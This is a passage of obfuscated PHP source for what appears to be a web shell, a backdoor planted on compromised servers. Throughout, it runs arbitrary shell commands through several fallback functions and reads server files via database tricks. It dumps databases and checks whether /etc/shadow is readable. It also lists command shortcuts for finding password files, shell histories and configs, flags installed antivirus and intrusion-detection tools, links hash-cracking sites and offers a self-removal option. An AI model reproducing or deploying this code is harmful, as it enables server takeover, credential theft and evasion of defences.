style='width:100%'></td></tr>\r\n\t\t\t<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS['cwd']) . "' style='width:100%'></td></tr>\r\n\t\t\t<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>\r\n\t\t\t<tr><td></td><td><input type='submit' value='>>'></td></tr>\r\n\t\t\t</table></form>"; goto B7139; f2713: F274e: goto d4e5f; E7f63: echo "</div><br><h1>Search for hash:</h1><div class=content>\r\n\t\t<form method='post' target='_blank' name='hf'>\r\n\t\t\t<input type='text' name='hash' style='width:200px;'><br>\r\n            <input type='hidden' name='act' value='find'/>\r\n\t\t\t<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>\r\n\t\t\t<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>\r\n            <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>\r\n\t\t</form></div>"; goto c7522; d4e5f: echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;' : '') . "margin-top:5px' id='strOutput'>"; goto B67fd; B67fd: if (!empty($_POST['p1'])) { if (in_array($_POST['p1'], $stringTools)) { echo htmlspecialchars($_POST['p1']($_POST['p2'])); } } goto C3956; e473d: } goto fcada; Febf6: function actionSql() { goto D6ce2; C0132: echo ">MySql</option><option value='pgsql' "; goto Bca2f; Caf5c: nBAeXHeader(); goto fbce4; b0adc: if (isset($db) && $db->link) { goto f129a; f129a: echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; goto B1526; b5320: if (@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '<br/><pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>'; } goto Fafc0; Ed4aa: if ($_POST['type'] == 'mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } } goto b5320; d36d1: echo "</table></form><br/>"; goto Ed4aa; B1526: if (!empty($_POST['sql_base'])) { goto e38a7; A1173: $tbls_res = $db->listTables(); goto D6fa5; e0cfc: echo "</textarea><br/><input type=submit value='Execute'>"; goto e910e; bd16f: if (!empty($_POST['sql_count'])) { $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . '')); } goto Fe6d0; D425f: a30cc: goto D7e73; b0280: list($key, $value) = each($item); goto bd16f; Fe6d0: $value = htmlspecialchars($value); goto Aaa86; e38a7: $db->selectdb($_POST['sql_base']); goto ae48c; F187c: if (@$_POST['p1'] == 'query' && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if ($db->res !== false) { goto eac41; f1d2c: foreach ($item as $key => $value) { if ($value == null) { echo '<td><i>null</i></td>'; } else { echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>'; } cf529: } goto D969e; C0583: echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">'; goto E739e; D969e: C0609: goto Aedaa; B795a: e698a: goto d0b4b; d0b4b: echo '</table>'; goto F3037; Dbd22: goto b4a7c; goto B795a; A9111: b4a7c: goto E5f07; Cadfe: $line = $line == 1 ? 2 : 1; goto f1d2c; a61cf: echo '<tr class="l' . $line . '">'; goto Cadfe; E739e: $line = 1; goto A9111; Aedaa: echo '</tr>'; goto Dbd22; E5f07: if (!($item = $db->fetch())) { goto e698a; } goto B515d; B515d: if (!$title) { goto A05d3; b0a0a: echo '</tr><tr>'; goto Cda1d; A05d3: echo '<tr>'; goto B79a9; Cda1d: $line = 2; goto bb90b; E740b: $title = true; goto b0a0a; e7ad1: reset($item); goto E740b; B79a9: foreach ($item as $key => $value) { echo '<th>' . $key . '</th>'; C012b: } goto ae01f; ae01f: ef222: goto e7ad1; bb90b: } goto a61cf; eac41: $title = false; goto C0583; F3037: } else { echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>'; } } goto F4d28; Aaa86: echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'>&nbsp;<a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? '&nbsp;' : " <small>({$n['n']})</small>") . "</nobr><br>"; goto d7889; e910e: echo "</td></tr>"; goto A51bb; C6277: if (!empty($_POST['p2']) && $_POST['p1'] != 'loadfile') { echo htmlspecialchars($_POST['p2']); } goto e0cfc; D6fa5: d60e1: goto c1d90; ae48c: echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; goto A1173; c1d90: if (!($item = $db->fetch($tbls_res))) { goto a30cc; } goto b0280; F4d28: echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; goto C6277; e0319: if (@$_POST['p1'] == 'select') { goto ed64b; B3aaa: if ($_POST['p3'] < $pages) { echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next &gt;</a>"; } goto Aae4c; dc940: $num = $db->fetch(); goto cc161; E716b: $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); goto dc940; B308f: echo "<br><br>"; goto d6cff; c33ef: $_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1; goto E716b; Ce98d: echo " of {$pages}"; goto ee7b8; E0a49: echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . (int) $_POST['p3'] . ">"; goto Ce98d; ee7b8: if ($_POST['p3'] > 1) { echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>&lt; Prev</a>"; } goto B3aaa; cc161: $pages = ceil($num['n'] / 30); goto E0a49; c3797: if ($_POST['type'] == 'pgsql') { $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . $_POST['p3'] * 30; } else { $_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . $_POST['p3'] * 30 . ',30'; } goto B308f; Aae4c: $_POST['p3']--; goto c3797; ed64b: $_POST['p1'] = 'query'; goto c33ef; d6cff: } goto F187c; d7889: goto d60e1; goto D425f; D7e73: echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; goto e0319; A51bb: } goto d36d1; Fafc0: } else { echo htmlspecialchars($db->error()); } goto d3d8f; a1f57: $db = new DbClass($_POST['type']); goto B6cf9; D6ce2: class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { goto Bfa15; C74b9: return false; goto Aecb6; Bfa15: switch ($this->type) { case 'mysql': if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } goto Afe0b; case 'pgsql': goto cfc5f; b080a: goto Afe0b; goto Da2d4; cfc5f: $host = explode(':', $host); goto Fc2ec; F66e9: if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; } goto b080a; Fc2ec: if (!$host[1]) { $host[1] = 5432; } goto F66e9; Da2d4: } goto ea38c; da11e: Afe0b: goto C74b9; ea38c: C6d65: goto da11e; Aecb6: } function selectdb($db) { goto dbf1b; A0994: bb5b4: goto dda70; dbf1b: switch ($this->type) { case 'mysql': if (@mysql_select_db($db)) { return true; } goto B12a1; } goto A0994; E1ce3: return false; goto c2da5; dda70: B12a1: goto E1ce3; c2da5: } function query($str) { goto Ade48; Dec46: Dabdc: goto Ba4ec; Ba4ec: c3389: goto da796; da796: return false; goto E19c5; Ade48: switch ($this->type) { case 'mysql': return $this->res = @mysql_query($str); goto c3389; case 'pgsql': return $this->res = @pg_query($this->link, $str); goto c3389; } goto Dec46; E19c5: } function fetch() { goto E3b91; f44c9: switch ($this->type) { case 'mysql': return @mysql_fetch_assoc($res); goto d1bfc; case 'pgsql': return @pg_fetch_assoc($res); goto d1bfc; } goto af7f4; af7f4: f3da3: goto f1d89; f1d89: d1bfc: goto b9f72; E3b91: $res = func_num_args() ? func_get_arg(0) : $this->res; goto f44c9; b9f72: return false; goto af519; af519: } function listDbs() { goto Bfec1; D9622: return false; goto B0040; a422b: fbc48: goto D9622; Bfec1: switch ($this->type) { case 'mysql': return $this->query("SHOW databases"); goto fbc48; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); goto fbc48; } goto e3d41; e3d41: Adc06: goto a422b; B0040: } function listTables() { goto F44c5; e1864: Db08f: goto C9853; C9853: return false; goto F6b2e; F44c5: switch ($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); goto Db08f; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); goto Db08f; } goto a8abc; a8abc: B423b: goto e1864; F6b2e: } function error() { goto a192a; Ac56b: F44e6: goto Ef969; Ef969: D610c: goto Bae6d; Bae6d: return false; goto e4ac7; a192a: switch ($this->type) { case 'mysql': return @mysql_error(); goto D610c; case 'pgsql': return @pg_last_error(); goto D610c; } goto Ac56b; e4ac7: } function setCharset($str) { goto Db8e7; A2fcc: return false; goto f955f; Db8e7: switch ($this->type) { case 'mysql': if (function_exists('mysql_set_charset')) { return @mysql_set_charset($str, $this->link); } else { $this->query('SET CHARSET ' . $str); } goto C0fa2; case 'pgsql': return @pg_set_client_encoding($this->link, $str); goto C0fa2; } goto baf85; Ac6d8: C0fa2: goto A2fcc; baf85: f8944: goto Ac6d8; f955f: } function loadFile($str) { goto ab691; ab691: switch ($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); goto f9968; case 'pgsql': goto Ccae5; f543b: Bb2e1: goto B9a76; d28f8: return array('file' => implode("\n", $r)); goto A19be; A19be: goto f9968; goto A7832; B9a76: $this->query('drop table nBAeX2'); goto d28f8; Ccae5: $this->query("CREATE TABLE nBAeX2(file text);COPY nBAeX2 FROM '" . addslashes($str) . "';select file from nBAeX2;"); goto de014; de014: $r = array(); goto eae91; A5aa2: $r[] = $i['file']; goto C222b; C222b: goto Bbe00; goto f543b; ce655: if (!($i = $this->fetch())) { goto Bb2e1; } goto A5aa2; eae91: Bbe00: goto ce655; A7832: } goto E01c3; E7370: return false; goto c79b6; e5d19: f9968: goto E7370; E01c3: A80db: goto e5d19; c79b6: } function dump($table, $fp = false) { goto b597a; C9b9d: return false; goto Ba3ff; c1d7c: E51a1: goto C9b9d; b597a: switch ($this->type) { case 'mysql': goto b3149; Ddd3f: goto E51a1; goto Ea1d1; D7f4d: b4ae5: goto C64bb; e18af: if ($i % 1000 == 0) { $head = true; $sql = ";\n\n"; } goto b9e60; b9e60: $columns = array(); goto ea3a9; Ebd73: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto B7ae8; ceaf2: $sql = ''; goto e18af; B7ae8: $i++; goto C198d; bff34: $head = true; goto fd2a3; C198d: goto b3497; goto D7f4d; F2f2d: $create = mysql_fetch_array($res); goto Bbaae; b3149: $res = $this->query('SHOW CREATE TABLE `' . $table . '`'); goto F2f2d; C64bb: if (!$head) { if ($fp) { fwrite($fp, ";\n\n"); } else { echo ";\n\n"; } } goto Ddd3f; Df818: if ($head) { $sql .= 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES \n\t(" . implode(", ", $item) . ')'; $head = false; } else { $sql .= "\n\t,(" . implode(", ", $item) . ')'; } goto Ebd73; cd527: if (!($item = $this->fetch())) { goto b4ae5; } goto ceaf2; D6d05: A4aa1: goto Df818; fae59: $this->query('SELECT * FROM `' . $table . '`'); goto b9d7b; fd2a3: b3497: goto cd527; b660e: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto fae59; b9d7b: $i = 0; goto bff34; Bbaae: $sql = $create[1] . ";\n"; goto b660e; ea3a9: foreach ($item as $k => $v) { goto e86dc; ff554: a39b2: goto Ff952; e86dc: if ($v === null) { $item[$k] = "NULL"; } elseif (is_int($v)) { $item[$k] = $v; } else { $item[$k] = "'" . @mysql_real_escape_string($v) . "'"; } goto Addfb; Addfb: $columns[] = "`" . $k . "`"; goto ff554; Ff952: } goto D6d05; Ea1d1: case 'pgsql': goto a5a52; f5a86: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto Fe985; D44b9: bd7a1: goto a7946; a5a52: $this->query('SELECT * FROM ' . $table); goto D44b9; Fcfec: Dc444: goto bfc7a; Fe985: goto bd7a1; goto E2596; bfc7a: $sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "\n"; goto f5a86; da6c5: goto E51a1; goto Da72b; E2596: bcb1f: goto da6c5; De6ff: $columns = array(); goto Bae6b; Bae6b: foreach ($item as $k => $v) { goto ec140; B50e6: $columns[] = $k; goto Fca8e; ec140: $item[$k] = "'" . addslashes($v) . "'"; goto B50e6; Fca8e: b39d2: goto F72a0; F72a0: } goto Fcfec; a7946: if (!($item = $this->fetch())) { goto bcb1f; } goto De6ff; Da72b: } goto cd9e0; cd9e0: F2d60: goto c1d7c; Ba3ff: } } goto a1f57; e5095: echo "</td>\r\n\t\t\t\t<td><input type=submit value='>>' onclick='fs(d.sf);'></td>\r\n                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td>\r\n\t\t\t</tr>\r\n\t\t</table>\r\n\t\t<script>\r\n            s_db='" . @addslashes($_POST['sql_base']) . "';\r\n            function fs(f) {\r\n                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\r\n                    if(f.p1) f.p1.value='';\r\n                    if(f.p2) f.p2.value='';\r\n                    if(f.p3) f.p3.value='';\r\n                }\r\n            }\r\n\t\t\tfunction st(t,l) {\r\n\t\t\t\td.sf.p1.value = 'select';\r\n\t\t\t\td.sf.p2.value = t;\r\n                if(l && d.sf.p3) d.sf.p3.value = l;\r\n\t\t\t\td.sf.submit();\r\n\t\t\t}\r\n\t\t\tfunction is() {\r\n\t\t\t\tfor(i=0;i<d.sf.elements['tbl[]'].length;++i)\r\n\t\t\t\t\td.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\r\n\t\t\t}\r\n\t\t</script>"; goto b0adc; ed500: $tmp = "<input type=text name=sql_base value=''>"; goto Bd9ca; Dc437: if (@$_POST['type'] == 'mysql') { echo 'selected'; } goto C0132; B6cf9: if (@$_POST['p2'] == 'download' && @$_POST['p1'] != 'select') { goto a21df; E59a4: b8835: goto d577c; Fbe53: c57e2: goto E59a4; c489e: $db->selectdb($_POST['sql_base']); goto d4e9f; a21df: $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); goto c489e; d4e9f: switch ($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); goto b8835; case "UTF-8": $db->setCharset('utf8'); goto b8835; case "KOI8-R": $db->setCharset('koi8r'); goto b8835; case "KOI8-U": $db->setCharset('koi8u'); goto b8835; case "cp866": $db->setCharset('cp866'); goto b8835; } goto Fbe53; d577c: if (empty($_POST['file'])) { goto e82fb; Abbe9: header("Content-Disposition: attachment; filename=dump.sql"); goto a9d1e; e82fb: ob_start("ob_gzhandler", 4096); goto Abbe9; Dc770: a7a8e: goto Ba6f9; a9d1e: header("Content-Type: text/plain"); goto fd959; fd959: foreach ($_POST['tbl'] as $v) { $db->dump($v); A4c66: } goto Dc770; Ba6f9: exit; goto F1336; F1336: } elseif ($fp = @fopen($_POST['file'], 'w')) { goto Fd6cd; Fd6cd: foreach ($_POST['tbl'] as $v) { $db->dump($v, $fp); B045e: } goto De4a1; D03ce: fclose($fp); goto de9d0; De4a1: F0163: goto D03ce; de9d0: unset($_POST['p2']); goto F097b; F097b: } else { die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); } goto d7f76; d7f76: } goto Caf5c; D98d4: nBAeXFooter(); goto C4c2c; Bd9ca: if (isset($_POST['sql_host'])) { if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { goto Ce51f; db047: Dc373: goto bec63; F8469: echo "<select name=sql_base><option value=''></option>"; goto db047; Ce51f: switch ($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); goto e4801; case "UTF-8": $db->setCharset('utf8'); goto e4801; case "KOI8-R": $db->setCharset('koi8r'); goto e4801; case "KOI8-U": $db->setCharset('koi8u'); goto e4801; case "cp866": $db->setCharset('cp866'); goto e4801; } goto B1132; bec63: if (!($item = $db->fetch())) { goto E44b8; } goto ac98e; A60ea: goto Dc373; goto A35f4; Ae32b: echo '</select>'; goto E786e; Ad67e: $db->listDbs(); goto F8469; A35f4: E44b8: goto Ae32b; ac98e: list($key, $value) = each($item); goto Ad274; B1132: c2247: goto af985; af985: e4801: goto Ad67e; Ad274: echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>'; goto A60ea; E786e: } else { echo $tmp; } } else { echo $tmp; } goto e5095; Bca2f: if (@$_POST['type'] == 'pgsql') { echo 'selected'; } goto C4e88; fbce4: echo "\r\n<h1>Sql browser</h1><div class=content>\r\n<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>\r\n<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\r\n<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n<td><select name='type'><option value='mysql' "; goto Dc437; d3d8f: echo '</div>'; goto D98d4; C4e88: echo ">PostgreSql</option></select></td>\r\n<td><input type=text name=sql_host value=\"" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "\"></td>\r\n<td><input type=text name=sql_login value=\"" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "\"></td>\r\n<td><input type=text name=sql_pass value=\"" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "\"></td><td>"; goto ed500; C4c2c: } goto E3bb7; F9fe4: @set_time_limit(0); goto De0b3; De0b3: if (get_magic_quotes_gpc()) { goto e71db; D2876: $_COOKIE = nBAeXstripslashes($_COOKIE); goto edc56; e71db: function nBAeXstripslashes($array) { return is_array($array) ? array_map('nBAeXstripslashes', $array) : stripslashes($array); } goto F8727; F8727: $_POST = nBAeXstripslashes($_POST); goto D2876; edc56: } goto dd4fe; a43cf: if (!$safe_mode) { error_reporting(0); } goto ece60; F8b69: $home_cwd = @getcwd(); goto beaff; eb0bb: $default_use_ajax = true; goto dff48; d61a1: @ini_set('log_errors', 0); goto ab65a; F4355: if ($os == 'win') { $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto ce14b; E3caf: if ($os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } goto E9e9d; C0920: function nBAeXWhich($p) { goto Fe355; e829c: if (!empty($path)) { return $path; } goto e0de6; e0de6: return false; goto A4cdd; Fe355: $path = nBAeXEx('which ' . $p); goto e829c; A4cdd: } goto b0244; ad91c: function actionSelfRemove() { goto ae44a; ae44a: if ($_POST['p1'] == 'yes') { if (@unlink(preg_replace('!\\(\\d+\\)\\s.*!', '', __FILE__))) { die('Shell has been removed'); } else { echo 'unlink error!'; } } goto E4f8f; E4f8f: if ($_POST['p1'] != 'yes') { nBAeXHeader(); } goto ac267; ac267: echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; goto B416f; B416f: nBAeXFooter(); goto ba167; ba167: } goto F8fee; C6f9c: function nBAeXsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto c95c8; b0244: function actionSecInfo() { goto C43c9; B4038: if (function_exists('apache_get_modules')) { nBAeXSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); } goto d2554; Ed757: if (function_exists('oci_connect')) { $temp[] = "Oracle"; } goto e0b28; ef2ff: if (function_exists('mysql_get_client_info')) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } goto d021d; C4b41: nBAeXSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); goto d5c6d; d2554: nBAeXSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none'); goto Ce33e; c276c: $temp = array(); goto ef2ff; Ce33e: nBAeXSecParam('Open base dir', @ini_get('open_basedir')); goto C4b41; E2f07: nBAeXFooter(); goto ca2f8; d021d: if (function_exists('mssql_connect')) { $temp[] = "MSSQL"; } goto cc76a; f2ee6: echo '<h1>Server security information</h1><div class=content>'; goto a1c2e; Fa300: nBAeXSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no'); goto c276c; F45d8: if ($GLOBALS['os'] == 'nix') { goto ef28d; ef28d: nBAeXSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no'); goto E745d; db572: nBAeXSecParam('OS version', @file_get_contents('/proc/version')); goto C9974; C9974: nBAeXSecParam('Distr name', @file_get_contents('/etc/issue.net')); goto F0d18; E745d: nBAeXSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>" : 'no'); goto db572; F0d18: if (!$GLOBALS['safe_mode']) { goto fe053; e11ef: b3ec1: goto fbb33; C83ce: echo '<br/>'; goto C0aed; e5ea8: $temp = array(); goto F26b2; C0aed: nBAeXSecParam('HDD space', nBAeXEx('df -h')); goto D30a0; b4f04: foreach ($danger as $item) { if (nBAeXWhich($item)) { $temp[] = $item; } Aebd2: } goto c11aa; d7183: $temp = array(); goto b3126; acd3b: if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { goto c6510; b4e16: echo '<br/>'; goto a0203; f85e0: $uid = @posix_getpwuid($_POST['p2']); goto B5a17; Bee60: Cc503: goto C7a16; E861b: fe468: goto c16de; c3a6c: goto Cc503; goto e1838; c6510: $temp = ""; goto Bee60; e1838: D8078: goto b4e16; C7a16: if (!($_POST['p2'] <= $_POST['p3'])) { goto D8078; } goto f85e0; a0203: nBAeXSecParam('Users', $temp); goto be151; c16de: $_POST['p2']++; goto c3a6c; B5a17: if ($uid) { $temp .= join(':', $uid) . "\n"; } goto E861b; be151: } goto a8a53; b3126: foreach ($userful as $item) { if (nBAeXWhich($item)) { $temp[] = $item; } A25d3: } goto ca1e1; fbb33: nBAeXSecParam('Downloaders', implode(', ', $temp)); goto C83ce; D30a0: nBAeXSecParam('Hosts', @file_get_contents('/etc/hosts')); goto C0abe; ca1e1: Ca0a3: goto F9b0b; e7b50: nBAeXSecParam('Danger', implode(', ', $temp)); goto e5ea8; B6825: $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror'); goto cf579; fc908: $danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja'); goto B6825; c11aa: d5103: goto e7b50; F26b2: foreach ($downloaders as $item) { if (nBAeXWhich($item)) { $temp[] = $item; } D772e: } goto e11ef; cf579: echo '<br>'; goto d7183; fe053: $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl'); goto fc908; F9b0b: nBAeXSecParam('Userful', implode(', ', $temp)); goto C3ee5; C3ee5: $temp = array(); goto b4f04; C0abe: echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>'; goto acd3b; a8a53: } goto C7416; C7416: } else { goto b1204; b1204: nBAeXSecParam('OS Version', nBAeXEx('ver')); goto E2650; a3f1b: nBAeXSecParam('User Accounts', nBAeXEx('net user')); goto a72bd; E2650: nBAeXSecParam('Account Settings', nBAeXEx('net accounts')); goto a3f1b; a72bd: } goto a5c2d; e0b28: nBAeXSecParam('Supported databases', implode(', ', $temp)); goto f0f8a; a5c2d: echo '</div>'; goto E2f07; f0f8a: echo '<br>'; goto F45d8; a1c2e: function nBAeXSecParam($n, $v) { $v = trim($v); if ($v) { echo '<span>' . $n . ': </span>'; if (strpos($v, "\n") === false) { echo $v . '<br>'; } else { echo '<pre class=ml1>' . $v . '</pre>'; } } } goto C9e59; d5c6d: nBAeXSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); goto Fa300; cc76a: if (function_exists('pg_connect')) { $temp[] = "PostgreSQL"; } goto Ed757; C9e59: nBAeXSecParam('Server software', @getenv('SERVER_SOFTWARE')); goto B4038; C43c9: nBAeXHeader(); goto f2ee6; ca2f8: } goto B1dd4; Fe0f4: error_reporting(0); goto a7d44; E9e9d: if ($cwd[strlen($cwd) - 1] != '/') { $cwd .= '/'; } goto Caf17; B8ddd: function nBAeXEx($in) { goto bcac7; A5b90: if (function_exists('exec')) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists('passthru')) { goto A32d5; C52c2: $out = ob_get_clean(); goto Db479; F5fb1: @passthru($in); goto C52c2; A32d5: ob_start(); goto F5fb1; Db479: } elseif (function_exists('system')) { goto d9999; adf31: @system($in); goto ad9a9; d9999: ob_start(); goto adf31; ad9a9: $out = ob_get_clean(); goto f9b0a; f9b0a: } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { goto E8be1; E8be1: $out = ""; goto A71fc; E6562: goto E1d2a; goto E9bad; E9bad: c6da4: goto Dac8f; Dac8f: pclose($f); goto c37c2; d1adb: $out .= fread($f, 1024); goto E6562; A71fc: E1d2a: goto a1051; a1051: if (@feof($f)) { goto c6da4; } goto d1adb; c37c2: } goto cf5a3; cf5a3: return $out; goto Aa857; bcac7: $out = ''; goto A5b90; Aa857: } goto e44aa; a8d30: 